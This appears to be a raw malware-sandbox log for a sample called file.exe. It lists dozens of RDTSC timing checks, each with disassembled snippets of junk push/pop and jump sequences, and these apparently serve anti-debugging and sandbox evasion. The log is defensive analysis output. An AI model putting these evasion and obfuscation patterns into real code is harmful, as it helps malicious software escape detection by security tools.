Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1A34 second address: 9D1A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51882 second address: A518D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F44646ECA46h 0x0000000b ja 00007F44646ECA46h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 js 00007F44646ECA46h 0x0000001c pop eax 0x0000001d jmp 00007F44646ECA4Dh 0x00000022 pushad 0x00000023 jnl 00007F44646ECA46h 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F44646ECA46h 0x00000034 jmp 00007F44646ECA56h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A518D4 second address: A518D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51BC4 second address: A51BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jo 00007F44646ECA46h 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F44646ECA4Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51BE0 second address: A51BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D71 second address: A51D88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D88 second address: A51D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D92 second address: A51D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D96 second address: A51D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D9C second address: A51DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5204D second address: A52060 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4465131BCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A521B6 second address: A521BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A521BC second address: A521C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A567D3 second address: A567D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A567D7 second address: A567F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4465131BD5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A567F4 second address: A567FE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CCA40 second address: 9CCA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CCA44 second address: 9CCA51 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59888 second address: A598A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5924D second address: A59251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59535 second address: A5953B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5953B second address: A59558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59558 second address: A5958B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4465131BCEh 0x0000000f jnc 00007F4465131BC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5958B second address: A59591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59591 second address: A595B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007F4465131BC8h 0x0000000e jmp 00007F4465131BCCh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BCA7 second address: A5BCC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F44646ECA46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007F44646ECA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BCC1 second address: A5BCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BCC5 second address: A5BCCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B9F8 second address: A5BA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A607F2 second address: A60810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F44646ECA6Eh 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB59 second address: A5FB76 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F4465131BD3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB76 second address: A5FB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F44646ECA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB81 second address: A5FB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FD30 second address: A5FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FD34 second address: A5FD42 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60055 second address: A60059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60059 second address: A60063 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE494 second address: 9CE498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE498 second address: 9CE4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F4465131BCCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4AE second address: 9CE4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4B6 second address: 9CE4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4465131BC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4C2 second address: 9CE4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A687DF second address: A68810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD1h 0x00000007 jmp 00007F4465131BD3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F4465131BC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670B6 second address: A670BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670BC second address: A670C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670C0 second address: A670EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F44646ECA46h 0x00000008 jmp 00007F44646ECA52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F44646ECA46h 0x00000017 jne 00007F44646ECA46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670EA second address: A670EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670EE second address: A670F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A674D4 second address: A674DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10580 second address: A105F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, 0D17h 0x00000010 mov ebx, dword ptr [ebp+124837B5h] 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F44646ECA48h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D1D5Ch], eax 0x00000036 add eax, ebx 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F44646ECA48h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1D87h] 0x00000058 nop 0x00000059 jp 00007F44646ECA50h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 pop eax 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A67AF0 second address: A67AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A67AF8 second address: A67AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A684F5 second address: A6850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4465131BCCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6AE8E second address: A6AE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B1AF second address: A6B1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B1B3 second address: A6B1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B1B7 second address: A6B1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B489 second address: A6B48F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B48F second address: A6B4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B4A1 second address: A6B4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B4A5 second address: A6B4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73903 second address: A73907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73907 second address: A7390D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71976 second address: A7197C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71AF3 second address: A71AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71C68 second address: A71C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71C6E second address: A71C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7225B second address: A7225F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72D95 second address: A72D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72D99 second address: A72DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F44646ECA4Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A732FC second address: A73302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73302 second address: A73308 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73308 second address: A73312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73312 second address: A73316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73316 second address: A7332F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4465131BCEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A768D6 second address: A768F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA56h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76A15 second address: A76A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76A1F second address: A76A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c jng 00007F44646ECA52h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA4Eh 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76B94 second address: A76BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E36 second address: A76E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E3A second address: A76E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4465131BD8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E58 second address: A76E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E5E second address: A76E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BD3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76FE5 second address: A76FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76FEC second address: A76FF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76FF1 second address: A77037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA59h 0x00000009 je 00007F44646ECA46h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jp 00007F44646ECA63h 0x00000019 jmp 00007F44646ECA57h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF4A second address: A7BF55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF55 second address: A7BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jng 00007F44646ECA46h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF69 second address: A7BF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF6F second address: A7BF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F44646ECA4Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A835DB second address: A835DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A835DF second address: A835E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83B60 second address: A83B66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83B66 second address: A83B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83B71 second address: A83B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4465131BC6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F4465131BDBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85176 second address: A8519C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F44646ECA4Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A8DB second address: A8A8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCEh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C5F5 second address: A9C5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C5F9 second address: A9C61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4465131BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F4465131BCEh 0x00000012 jnc 00007F4465131BC6h 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C61B second address: A9C646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F44646ECA46h 0x00000009 pop esi 0x0000000a jnc 00007F44646ECA4Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 js 00007F44646ECA4Ah 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007F44646ECA46h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C444 second address: A9C44A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
